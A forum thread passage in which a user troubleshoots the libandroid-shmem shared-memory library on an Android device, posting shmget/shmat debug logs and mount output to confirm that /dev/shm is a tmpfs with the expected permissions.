shmget: ID 0 shmid 1f6e0001 FD 36 size 2834432
shmat: shmid 1f6e0001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x71b6582000 for FD 36 ID 0
shm_remove: deleting shmid 1f6e0001
shm_remove: shmid 1f6e0001 is still mapped to addr 0x71b6582000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x71b6582000 for FD 36 ID 0 shmid 1f6e0001
shmdt: deleting shmid 1f6e0001
listening_thread: thread started
[7990:7990:0426/232440.532571:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
I am not sure how to check if my libandroid-shmem-aarch64.so is working ??
I would expect some "files" in /dev/shm but there is nothing there ...
Click to expand...
Click to collapse
looks fine when run as root...
is /dev/shm mounted as tmpfs?
/dev/shm should then have 1777 permissions

zanfix said:
looks fine when run as root...
is /dev/shm mounted as tmpfs?
/dev/shm should then have 1777 permissions
Click to expand...
Click to collapse
It looks like I am good :
[email protected]:/dev$ mount
/dev/block/mmcblk0p57 on / type ext4 (rw,noatime,seclabel,discard,journal_checksum,noauto_da_alloc,resgid=1065,errors=panic,i_version,data=ordered)
proc on /proc type proc (rw,relatime,gid=3009,hidepid=2)
sys on /sys type sysfs (rw,relatime,seclabel)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,seclabel,size=2871960k,nr_inodes=717990,mode=755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime,seclabel)
devpts on /dev/pts type devpts (rw,relatime,seclabel,mode=600,ptmxmode=000)
[email protected]:/dev$ ls -ld shm
drwxrwxrwt. 2 root root 40 Apr 26 23:59 shm
[email protected]:/dev$